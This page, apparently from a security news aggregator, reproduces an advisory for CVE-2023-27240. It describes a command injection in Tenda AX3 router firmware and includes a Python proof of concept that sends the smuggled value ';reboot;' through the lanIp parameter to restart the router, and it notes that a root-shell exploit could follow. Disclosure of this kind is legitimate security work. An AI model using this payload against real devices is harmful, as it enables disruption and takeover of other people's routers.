Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-27240: CVE/readme.md at main · yjzy00001/CVE

Tenda AX3 V16.03.12.11 was discovered to contain a command injection vulnerability via the lanip parameter at /goform/AdvSetLanip.

CVE
Open in Source
#vulnerability#telnet

Tenda AX3 V16.03.12.11 command injection vulnerability****Firmware information

  • Manufacturer’s address:https://www.tenda.com.cn/

  • Firmware download address : https://www.tenda.com.cn/download/detail-3476.html

Affected version

Vulnerability details

In /goform/AdvSetLanip, /goform/telnet, You can set lanip in AdvSetLanip. In the telnet function, the program will get the value of lanip and pass it into the system without any filtering. If the user passes in a malicious command, it will cause a command injection vulnerability.

Poc

import requests

url = “http://192.168.0.1/goform/AdvSetLanip”

lanIp = ‘;reboot;’

r = requests.post(url, data={’lanIp’: lanIp}) print(r.content)

url = “http://192.168.0.1/goform/telnet”

r = requests.post(url, data={’lanIp’: lanIp}) print(r.content)

You can see that the router restarts, forming a command injection vulnerability, and finally you can write exp to get root shell

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE